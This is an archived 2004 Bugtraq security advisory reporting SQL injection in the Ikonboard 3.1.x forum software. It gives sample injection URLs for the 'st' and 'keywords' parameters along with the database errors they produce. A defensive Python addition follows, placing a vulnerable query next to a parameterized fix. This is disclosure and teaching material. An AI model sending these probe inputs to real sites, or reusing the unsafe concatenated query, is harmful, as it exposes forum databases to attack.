List: bugtraq
Subject: [MaxPatrol] SQL-injection in Ikonboard 3.1.x
From: Alexander Anisimov <anisimov () ptsecurity ! com>
Date: 2004-12-16 17:02:27
Message-ID: 20041216225108.29333.qmail () www ! securityfocus ! com
[MaxPatrol] SQL-injection in Ikonboard 3.1.x
Release Date: December 16, 2004
Date Reported: December 2, 2004
Severity: High
Application: Ikonboard 3.1.x
Affects versions: 3.1.0, 3.1.1, 3.1.2 and 3.1.3.
Platform: PHP
I. DESCRIPTION
Input passed to the "st" and "keywords" parameters in "ikonboard.cgi" is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
1) SQL injection in "st" parameter
Example:
http://host/support/ikonboard.cgi?act=ST&f=27&t=13066&hl=nickname&st=1'
Result:
Ikonboard CGI Error
-----------------------------------------------------------------------
Ikonboard has exited with the following error:
Can't query the data from 'forum_posts' Reason: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '', 20'
This error was reported at: line 1 Query: SELECT * FROM iB313_forum_posts WHERE TOPIC_ID = '13066' AND QUEUED <> '1' ORDER BY POST_DATE ASC LIMIT 1', 20
Please note that your 'real' paths have been removed to protect your information.
-----------------------------------------------------------------------
2) SQL injection in "keywords" parameter
Example:
http://host/support/ikonboard.cgi?act=Search&CODE=01&keywords='&type=name&forums=all&search_in=all&prune=0
Result:
Ikonboard CGI Error
-----------------------------------------------------------------------
Ikonboard has exited with the following error:
mySQL error
Can't query the data: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ') ORDER BY DATE DESC LIMIT 0,200'
This error was reported at: line 1
Please note that your 'real' paths have been removed to protect your information.
-----------------------------------------------------------------------
This vulnerability was found automatically by the full-featured commercial version of MaxPatrol.
II. IMPACT
A remote user may be able to execute arbitrary SQL commands on the underlying database.
III. SOLUTION
Not available currently.
IV. VENDOR FIX/RESPONSE
Notified.
V. CREDIT
This vulnerability was discovered by Positive Technologies using MaxPatrol
(http://www.maxpatrol.com), an intelligent professional security scanner.
It is able to detect a substantial number of vulnerabilities that have not
yet been published. MaxPatrol's intelligent algorithms are also capable of
detecting many vulnerabilities in custom web scripts (XSS, SQL and code
injections, HTTP Response splitting).
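
Added example, not part of the original advisory and not Ikonboard's code: a Python sketch of the query pattern visible in the "st" error output, next to a hardened form that validates the paging offset and binds every value, plus a bound "keywords" search. It assumes an in-memory SQLite table standing in for MySQL; the function names, the POST column and the sample rows are constructed for illustration.

```python
import sqlite3

PAGE_SIZE = 20  # the ", 20" visible in the advisory's error output

def build_db():
    # Constructed sample data; names follow the query shown in the error output.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE forum_posts (POST_ID INTEGER PRIMARY KEY, "
               "TOPIC_ID TEXT, QUEUED TEXT, POST_DATE INTEGER, POST TEXT)")
    db.executemany("INSERT INTO forum_posts VALUES (?, ?, ?, ?, ?)",
                   [(i, "13066", "0", 1000 + i, f"post {i}") for i in range(1, 31)])
    return db

def posts_unsafe(db, topic_id, st):
    # Weak form: request values are spliced into the SQL text, so a stray
    # quote in "st" changes the statement itself (the error in the advisory).
    sql = ("SELECT * FROM forum_posts WHERE TOPIC_ID = '%s' AND QUEUED <> '1' "
           "ORDER BY POST_DATE ASC LIMIT %s, %d" % (topic_id, st, PAGE_SIZE))
    return db.execute(sql).fetchall()

def parse_offset(st, max_offset=1_000_000):
    # "st" is a paging offset: accept ASCII digits only, within a bound.
    if not (isinstance(st, str) and st.isascii() and st.isdigit()):
        raise ValueError("st must be a non-negative integer")
    offset = int(st)
    if offset > max_offset:
        raise ValueError("st out of range")
    return offset

def posts_safe(db, topic_id, st):
    # Hardened form: validated offset, every value bound as a parameter.
    sql = ("SELECT * FROM forum_posts WHERE TOPIC_ID = ? AND QUEUED <> '1' "
           "ORDER BY POST_DATE ASC LIMIT ?, ?")
    return db.execute(sql, (topic_id, parse_offset(st), PAGE_SIZE)).fetchall()

def search_safe(db, keywords):
    # "keywords" is bound as data; LIKE wildcards in it are escaped.
    for ch in ("\\", "%", "_"):
        keywords = keywords.replace(ch, "\\" + ch)
    sql = ("SELECT POST_ID FROM forum_posts WHERE POST LIKE ? ESCAPE '\\' "
           "ORDER BY POST_DATE DESC LIMIT 0, 200")
    return db.execute(sql, ("%" + keywords + "%",)).fetchall()
```

With the hardened functions, the `st=1'` and `keywords='` requests from section I are rejected or treated as plain data instead of reaching the SQL parser as syntax.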